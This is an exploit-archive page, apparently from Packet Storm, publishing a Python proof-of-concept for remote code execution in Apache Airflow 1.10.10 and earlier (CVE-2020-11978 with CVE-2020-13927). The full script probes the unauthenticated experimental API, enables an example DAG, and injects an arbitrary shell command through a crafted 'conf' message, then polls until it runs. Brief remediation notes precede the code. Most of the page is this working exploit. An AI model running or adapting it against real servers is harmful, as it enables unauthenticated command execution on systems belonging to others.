what you don't know can hurt you

Apache Airflow 1.10.10 Remote Code Execution

Apache Airflow 1.10.10 Remote Code Execution
Posted Jun 2, 2021
Authored by Pepe Berba

Apache Airflow versions 1.10.10 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2020-11978, CVE-2020-13927
MD5 | 239a2ba62a400089b2fa529aa54e7b85

Apache Airflow 1.10.10 Remote Code Execution

Change Mirror Download
# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution 
# Date: 2021-06-02
# Exploit Author: Pepe Berba
# Vendor Homepage: https://airflow.apache.org/
# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
# Version: <= 1.10.10
# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
# CVE : CVE-2020-11978
#
# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow
# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.
# Together, potentially allows unauthenticated RCE to Airflow
#
# Repo: https://github.com/pberba/CVE-2020-11978
# More information can be found here:
# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
#
# Remediation:
# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.
#
# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"

import argparse
import requests
import sys
import time

def create_dag(url, cmd):
print('[+] Checking if Airflow Experimental REST API is accessible...')
check = requests.get('{}/api/experimental/test'.format(url))

if check.status_code == 200:
print('[+] /api/experimental/test returned 200' )
else:
print('[!] /api/experimental/test returned {}'.format(check.status_code))
print('[!] Airflow Experimental REST API not be accessible')
sys.exit(1)

check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
if check_task.status_code != 200:
print('[!] Failed to find the example_trigger_target_dag.bash_task')
print('[!] Host isn\'t vunerable to CVE-2020-11978')
sys.exit(1)
elif 'dag_run' in check_task.json()['env']:
print('[!] example_trigger_target_dag.bash_task is patched')
print('[!] Host isn\'t vunerable to CVE-2020-11978')
sys.exit(1)
print('[+] example_trigger_target_dag.bash_task is vulnerable')

unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
if unpause.status_code != 200:
print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
sys.exit(1)
else:
print('[+] example_trigger_target_dag was enabled')

print('[+] Creating new DAG...')
res = requests.post(
'{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
json={
'conf': {
'message': '"; {} #'.format(cmd)
}
}
)

if res.status_code == 200:
print('[+] Successfully created DAG')
print('[+] "{}"'.format(res.json()['message']))
else:
print('[!] Failed to create DAG')
sys.exit(1)

wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
url = url,
execution_date=res.json()['execution_date']
)

start_time = time.time()
print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
print('[.] If the bash task is never queued, then the scheduler might not be running.')
while True:
time.sleep(10)
res = requests.get(wait_url)
status = res.json()['state']
if status == 'queued':
print('[.] Bash task queued...')
elif status == 'running':
print('[+] Bash task running...')
elif status == 'success':
print('[+] Bash task successfully ran')
break
elif status == 'None':
print('[-] Bash task is not yet queued...'.format(status))
else:
print('[!] Bash task was {}'.format(status))
sys.exit(1)

return 0


def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
arg_parser.add_argument('command', type=str)
args = arg_parser.parse_args()

create_dag(
args.url,
args.command
)

if __name__ == '__main__':
main()

Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close